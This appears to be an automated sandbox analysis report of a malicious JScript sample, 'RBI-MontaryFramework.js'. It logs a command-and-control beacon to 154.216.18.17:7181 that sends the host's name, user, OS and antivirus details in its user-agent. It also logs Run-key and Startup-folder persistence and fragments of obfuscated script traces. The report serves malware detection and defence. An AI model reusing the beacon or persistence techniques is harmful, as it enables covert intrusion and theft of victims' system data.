    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.17
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.17
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.17
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.17
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.17
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.17
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.17
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.17
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.17
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.17
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.17
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.17
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.17
    Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.17
    Source: unknownHTTP traffic detected: POST /is-ready HTTP/1.1Accept: */*user-agent: B81A4609<|>user-PC<|>user<|>Microsoft Windows 10 Pro<|>Plus<|>Windows Defender .<|>false - 2/1/2025Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 154.216.18.17:7181Content-Length: 0Connection: Keep-AliveCache-Control: no-cache

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    barindex
    Source: Yara matchFile source: dump.pcap, type: PCAP

    System Summary

    barindex
    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
    Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\RBI-MontaryFramework.js"
    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\WScript.exe" //B "C:\Users\user\AppData\Roaming\RBI-MontaryFramework.js"
    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\WScript.exe" //B "C:\Users\user\AppData\Roaming\RBI-MontaryFramework.js"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\RBI-MontaryFramework.js"Jump to behavior
    Source: RBI-MontaryFramework.jsInitial sample: Strings found which are bigger than 50
    Source: classification engineClassification label: mal100.troj.expl.evad.winJS@6/4@0/1
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\RBI-MontaryFramework.jsJump to behavior
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_Process
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_Process
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_Process
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_Process
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_Process
    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RBI-MontaryFramework.js"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\RBI-MontaryFramework.js"
    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\WScript.exe" //B "C:\Users\user\AppData\Roaming\RBI-MontaryFramework.js"
    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\WScript.exe" //B "C:\Users\user\AppData\Roaming\RBI-MontaryFramework.js"
    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RBI-MontaryFramework.js"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\RBI-MontaryFramework.js"Jump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
    Source: C:\Windows\System32\wscript.exeAutomated click: OK
    Source: C:\Windows\System32\wscript.exeAutomated click: OK

    Data Obfuscation

    barindex
    Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: wscript.exe%20%2F%2FB%20%22%22 a1:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5C%22");ITextStream.WriteLine(" exit:15900 f:mQ r:%22wscript.exe%20%2F%2FB%20%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5C%22");ITextStream.WriteLine(" entry:15909 f:nA");ITextStream.WriteLine(" exec:536 f:nA");ITextStream.WriteLine(" exit:15909 f:nA r:%22RBI-MontaryFramework.js%22");ITextStream.WriteLine(" entry:15896 f:mQ a0:%22wscript.exe%20%2F%2FB%20%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5CRBI-MontaryFramework.js%22 a1:%22%22%22");ITextStream.WriteLine(" exit:15896 f:mQ r:%22wscript.exe%20%2F%2FB%20%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5CRBI-MontaryFramework.js%22%22");IWshShell3._00000000();ITextStream.WriteLine(" entry:15884 o: f:run a0:%22wscript.exe%20%2F%2FB%20%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5CRBI-MontaryFramework.js%22%22");IWshShell3.Run("wscript.exe //B "C:\Users\user\AppData\Roaming\RBI-MontaryFramework.js"");ITextStream.WriteLine(" exit:15909 f:nA r:%22RBI-MontaryFramework.js%22");ITextStream.WriteLine(" entry:15896 f:mQ a0:%22wscript.exe%20%2F%2FB%20%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5CRBI-MontaryFramework.js%22 a1:%22%22%22");ITextStream.WriteLine(" exit:15896 f:mQ r:%22wscript.exe%20%2F%2FB%20%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5CRBI-MontaryFramework.js%22%22");IWshShell3._00000000();ITextStream.WriteLine(" entry:15884 o: f:run a0:%22wscript.exe%20%2F%2FB%20%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5CRBI-MontaryFramework.js%22%22");IWshShell3.Run("wscript.exe //B "C:\Users\user\AppData\Roaming\RBI-MontaryFramework.js"");IWshShell3._00000000();ITextStream.WriteLine(" exit:15884 o: f:run r:0");ITextStream.WriteLine(" entry:15921 f:pr a0:function%20gw(dt%2C%20dp)");ITextStream.WriteLine(" exit:15921 f:pr r:false");ITextStream.WriteLine(" entry:15943");ITextStream.WriteLine(" exec:34125 f:");ITextStream.WriteLine(" entry:34129 a0:function%20() a1:null");ITextStream.WriteLine(" exec:33069 f:");ITextStream.WriteLine(" entry:33074 f:mT a0:function%20() a1:null");ITextStream.WriteLine(" exit:33074 f:mT r:false");ITextStream.WriteLine(" exit:34129 r:false");ITextStream.WriteLine(" entry:34172 f:rf");ITextStream.WriteLine(" exec:85339 f:rf");ITextStream.WriteLine(" entry:85343 f:pr a0:function%20gv()");ITextStream.WriteLine(" exit:85343 f:pr r:false");ITextStream.WriteLine(" exit:34172 f:rf r:undefined");ITextStream.WriteLine(" entry:34185");ITextStream.WriteLine(" exec:32972 f:");ITextStream.WriteLine(" entry:32976 f:pr a0:e*gsey1o%25ti%25e%25caihE%25%25dTfdlim%25n%25r%25%25(%20.ridntb%25%25eT%25ttiPTzcs%25%25%25eC%25aje%40tbfdep%25%25%25e%25spMpy%25%253Pyg%25rcs%25%25%25espRWkXr%25%25u%25i%25c%25lak%25eLnoor%25%258pn%25J%2");ITextStream.WriteLine(" exit:32976 f:pr r:false");ITextStream.WriteLine(" entry:32986 f:ox");ITextStream.WriteLine(" exec:580 f:ox");IWshShell3._00000000();ITextStream.WriteLine(" exit:32986 f:ox r:");IWshShell3._00000000();ITextStream.WriteLine(" exit:34185 r:");ITextStream.WriteLine(" entry:342
    Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: setRequestHeader a0:%22user-agent%3A%22 a1:%22B81A4609%3C%7C%3Euser-PC%3C%7C%3Euser%3C%7C%3EMicrosoft%20Windows%2010%20Pro%3C%7C%3EPlus%3C%7C%3EWindows%20Defender%20.%3C%7C%3Efalse%20-%202%2F1%2F2025%22");IServerXMLHTTPRequest2.setRequestHeader("user-agent:", "B81A4609<|>user-PC<|>user<|>Microsoft Windows 10 Pro<|>Plus<|>Windows Defender .<|>false - 2/1/2025");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:38654 o: f:setRequestHeader r:undefined");ITextStream.WriteLine(" entry:38693");ITextStream.WriteLine(" exec:31764 f:");ITextStream.WriteLine(" entry:31767 f:ov");ITextStream.WriteLine(" exec:340 f:ov");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:31767 f:ov r:");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:38693 r:");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:38691 o: f:send a0:%22%22");IServerXMLHTTPRequest2.send("");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:38348 o: f:open r:undefined");ITextStream.WriteLine(" entry:38656");ITextStream.WriteLine(" exec:31764 f:");ITextStream.WriteLine(" entry:31767 f:ov");ITextStream.WriteLine(" exec:340 f:ov");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:31767 f:ov r:");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:38656 r:");ITextStream.WriteLine(" entry:38671");ITextStream.WriteLine(" exec:31749 f:");ITextStream.WriteLine(" entry:31752 f:og");ITextStream.WriteLine(" exec:344 f:og");ITextStream.WriteLine(" exit:31752 f:og r:%22user-agent%3A%22");ITextStream.WriteLine(" exit:38671 r:%22user-agent%3A%22");ITextStream.WriteLine(" entry:38680");ITextStream.WriteLine(" exec:31741 f:");ITextStream.WriteLine(" exit:38680 r:function%20()");ITextStream.WriteLine(" entry:38679");ITextStream.WriteLine(" exec:25849 f:");ITextStream.WriteLine(" entry:25858 a0:function%20()");ITextStream.WriteLine(" exit:25858 r:false");ITextStream.WriteLine(" entry:25874 f:pr a0:function%20gw(dt%2C%20dp)");ITextStream.WriteLine(" exit:25874 f:pr r:false");ITextStream.WriteLine(" entry:25905 f:pf");ITextStream.WriteLine(" exec:348 f:pf");ITextStream.WriteLine(" exit:25905 f:pf r:%22B81A4609%3C%7C%3Euser-PC%3C%7C%3Euser%3C%7C%3EMicrosoft%20Windows%2010%20Pro%3C%7C%3EPlus%3C%7C%3EWindows%20Defender%20.%3C%7C%3Efalse%20-%202%2F1%2F2025%22");ITextStream.WriteLine(" entry:25897 a0:%22B81A4609%3C%7C%3Euser-PC%3C%7C%3Euser%3C%7C%3EMicrosoft%20Windows%2010%20Pro%3C%7C%3EPlus%3C%7C%3EWindows%20Defender%20.%3C%7C%3Efalse%20-%202%2F1%2F2025%22 a1:%22%22");ITextStream.WriteLine(" exit:25897 r:false");ITextStream.WriteLine(" entry:28002 a0:a%2Cb%2Cc%2Cd%2Ce%2Cf%2Cg%2Ch%2Ci%2CEx%2Cj%2Ck%2Cl%2Cm%2Cn%2Co%2Cp%2Cq%2Cr%2Cs%2Ct%2Cu%2Cv%2Cw%2Cx%2Cy%2Cz%2CA%2CB%2CC%2CD%2CE%2CF%2CG%2CH%2CI%2CJ%2CK%2CL%2CM%2CN%2CO%2CP%2CQ%2CR%2CS%2CT%2CU%2CV%2CW%2CX%2CY%2C");ITextStream.WriteLine(" exit:28002 r:false");ITextStream.WriteLine(" entry:28059 f:mU a0:function%20gv() a1:%22join%22");ITextStream.WriteLine(" exit:28059 f:mU r:

    Boot Survival

    barindex
    Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RBI-MontaryFrameworkJump to behavior
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RBI-MontaryFramework.jsJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RBI-MontaryFramework.jsJump to behavior
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RBI-MontaryFramework.jsJump to behavior
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RBI-MontaryFramework.js\:Zone.Identifier:$DATAJump to behavior
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RBI-MontaryFramework.js\:Zone.Identifier:$DATAJump to behavior
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RBI-MontaryFramework.js\:Zone.Identifier:$DATAJump to behavior
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RBI-MontaryFramework.js\:Zone.Identifier:$DATAJump to behavior
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RBI-MontaryFramework.js\:Zone.Identifier:$DATAJump to behavior
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RBI-MontaryFramework.js\:Zone.Identifier:$DATAJump to behavior
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RBI-MontaryFramework.js\:Zone.Identifier:$DATAJump to behavior
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RBI-MontaryFramework.js\:Zone.Identifier:$DATAJump to behavior
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RBI-MontaryFramework.js\:Zone.Identifier:$DATA
    Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RBI-MontaryFrameworkJump to behavior
    Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RBI-MontaryFrameworkJump to behavior

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 7181
    Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 7181
    Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 7181
    Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 7181
    Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 7181
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
